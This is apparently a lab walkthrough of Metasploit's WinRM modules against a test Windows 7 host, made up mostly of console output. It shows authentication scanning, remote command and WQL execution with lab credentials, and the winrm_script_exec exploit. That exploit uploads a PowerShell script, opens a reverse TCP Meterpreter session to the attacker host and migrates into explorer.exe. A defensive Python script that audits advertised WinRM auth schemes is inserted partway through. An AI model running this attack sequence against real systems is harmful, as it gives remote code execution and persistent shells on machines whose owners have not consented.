metasploit - winrm

WinRM

msf auxiliary(winrm_auth_methods) > show options

Module options (auxiliary/scanner/winrm/winrm_auth_methods):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DOMAIN   WORKSTATION      yes       The domain to use for Windows authentification
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.103    yes       The target address range or CIDR identifier
   RPORT    5985             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   URI      /wsman           yes       The URI of the WinRM service
   VHOST                     no        HTTP server virtual host

msf auxiliary(winrm_auth_methods) > run

[+] 192.168.1.103:5985: Negotiate protocol supported
[+] 192.168.1.103:5985: Basic protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
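The scan above works because an unauthenticated request to /wsman is answered with a 401 whose WWW-Authenticate headers list every scheme the listener accepts. The following Python script, an added example that is not part of the original post or of Metasploit, reproduces that check and turns the answer into defender findings: Basic on a plain-HTTP listener (the situation reported above) means credentials cross the wire base64-encoded rather than encrypted. The host, port and header values in the sample are constructed for illustration.

```python
"""Audit which authentication schemes a WinRM listener advertises.

Added example (not from the original post or from Metasploit): it mirrors the
idea behind auxiliary/scanner/winrm/winrm_auth_methods, an unauthenticated
POST to /wsman followed by parsing the WWW-Authenticate challenge(s), and
flags the settings a defender would want to change.
"""
import urllib.error
import urllib.request

# Challenge tokens WinRM can advertise on a listener (RFC 7235 scheme names).
KNOWN_SCHEMES = ("Negotiate", "Basic", "Kerberos", "CredSSP", "Digest")
_CANON = {s.lower(): s for s in KNOWN_SCHEMES}


def parse_www_authenticate(header_values):
    """Return the set of auth schemes named by one or more WWW-Authenticate values.

    WinRM usually sends one header per scheme ('Negotiate', 'Basic realm="WSMan"'),
    but a single comma-joined header is handled too. Commas inside a realm string
    are not expected from WinRM and are not special-cased.
    """
    schemes = set()
    for value in header_values:
        for part in value.split(","):
            part = part.strip()
            if not part:
                continue
            token = part.split(None, 1)[0].split("=", 1)[0]  # scheme token only
            canon = _CANON.get(token.lower())
            if canon:
                schemes.add(canon)
    return schemes


def assess(schemes, tls):
    """Return a list of findings (strings) for the advertised schemes."""
    findings = []
    if not schemes:
        findings.append("no WWW-Authenticate challenge: listener absent or not answering")
    if "Basic" in schemes and not tls:
        findings.append("Basic auth on an HTTP listener: credentials cross the wire "
                        "base64-encoded, not encrypted")
    if "Basic" in schemes and tls:
        findings.append("Basic auth enabled: prefer Negotiate/Kerberos only")
    if "CredSSP" in schemes:
        findings.append("CredSSP enabled: the client's full credentials are delegated "
                        "to the remote host")
    if "Negotiate" in schemes and "Basic" not in schemes and "CredSSP" not in schemes:
        findings.append("Negotiate only: expected hardened configuration")
    return findings


def probe(host, port=5985, tls=False, timeout=5):
    """Send an unauthenticated POST to /wsman and return the advertised schemes.

    The expected reply is 401 plus WWW-Authenticate; any other outcome yields
    an empty set. Not exercised offline; provided for use against your own hosts.
    """
    url = f"{'https' if tls else 'http'}://{host}:{port}/wsman"
    req = urllib.request.Request(
        url, data=b"", method="POST",
        headers={"Content-Type": "application/soap+xml;charset=UTF-8"})
    try:
        urllib.request.urlopen(req, timeout=timeout)
    except urllib.error.HTTPError as err:
        if err.code == 401:
            return parse_www_authenticate(err.headers.get_all("WWW-Authenticate") or [])
    except (urllib.error.URLError, OSError):
        pass
    return set()


# Constructed sample: the challenge a listener matching the post's result
# (Negotiate + Basic on port 5985 over plain HTTP) would return.
SAMPLE_HEADERS = ['Negotiate', 'Basic realm="WSMan"']


def demo():
    """Run the offline sample through the parser and the assessment."""
    schemes = parse_www_authenticate(SAMPLE_HEADERS)
    return schemes, assess(schemes, tls=False)


if __name__ == "__main__":
    advertised, findings = demo()
    print("advertised:", ", ".join(sorted(advertised)))
    for finding in findings:
        print(" -", finding)
```

Run it as-is to see the sample assessed, or call `probe("host")` against a listener you administer. On the service side, `winrm set winrm/config/service/auth @{Basic="false"}` removes the Basic scheme from the challenge, which is the change the first finding asks for.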

msf auxiliary(winrm_cmd) > show options

Module options (auxiliary/scanner/winrm/winrm_cmd):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CMD          whoami           yes       The windows command to run
   DOMAIN       WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD     password         yes       The password to authenticate with
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.1.103    yes       The target address range or CIDR identifier
   RPORT        5985             yes       The target port
   SAVE_OUTPUT  false            yes       Store output as loot
   THREADS      1                yes       The number of concurrent threads
   URI          /wsman           yes       The URI of the WinRM service
   USERNAME     lab              yes       The username to authenticate as
   VHOST                         no        HTTP server virtual host

msf auxiliary(winrm_cmd) > run

[+] sec\lab

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(winrm_wql) > show options

Module options (auxiliary/scanner/winrm/winrm_wql):

   Name       Current Setting                        Required  Description
   ----       ---------------                        --------  -----------
   DOMAIN     WORKSTATION                            yes       The domain to use for Windows authentification
   NAMESPACE  /root/cimv2/                           yes       The WMI namespace to use for queries
   PASSWORD   password                               yes       The password to authenticate with
   Proxies                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.103                          yes       The target address range or CIDR identifier
   RPORT      5985                                   yes       The target port
   THREADS    1                                      yes       The number of concurrent threads
   URI        /wsman                                 yes       The URI of the WinRM service
   USERNAME   lab                                    yes       The username to authenticate as
   VHOST                                             no        HTTP server virtual host
   WQL        Select Name,Status from Win32_Service  yes       The WQL query to run

msf auxiliary(winrm_wql) > run

[+] Select Name,Status from Win32_Service (192.168.1.103)
=====================================================

 Name                            Status
 ----                            ------
 ALG                             OK
 AeLookupSvc                     OK
 AppIDSvc                        OK
 AppMgmt                         OK
 ......
 ......

msf exploit(winrm_script_exec) > show options

Module options (exploit/windows/winrm/winrm_script_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     WORKSTATION      yes       The domain to use for Windows authentification
   FORCE_VBS  false            yes       Force the module to use the VBS CmdStager
   PASSWORD   password         yes       A specific password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.103    yes       The target address
   RPORT      5985             yes       The target port
   URI        /wsman           yes       The URI of the WinRM service
   USERNAME   lab              yes       A specific username to authenticate as
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf exploit(winrm_script_exec) > run

[*] Started reverse TCP handler on 192.168.1.102:4444 
[*] checking for Powershell 2.0
[-] You selected an x86 payload for an x64 target...trying to run in compat mode
[*] Attempting to set Execution Policy
[+] Set Execution Policy Successfully
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\lab\AppData\Local\Temp\XcemuUGC.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (957487 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:49514) at 2015-12-26 15:37:13 +0800

meterpreter > 
[*] Session ID 1 (192.168.1.102:4444 -> 192.168.1.103:49514) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: powershell.exe (1836)
[*] Attempting to move into explorer.exe for current user...
[+] Migrating to 2844
[+] Successfully migrated to process 2844

meterpreter > sysinfo
Computer        : SEC
OS              : Windows 7 (Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/win64
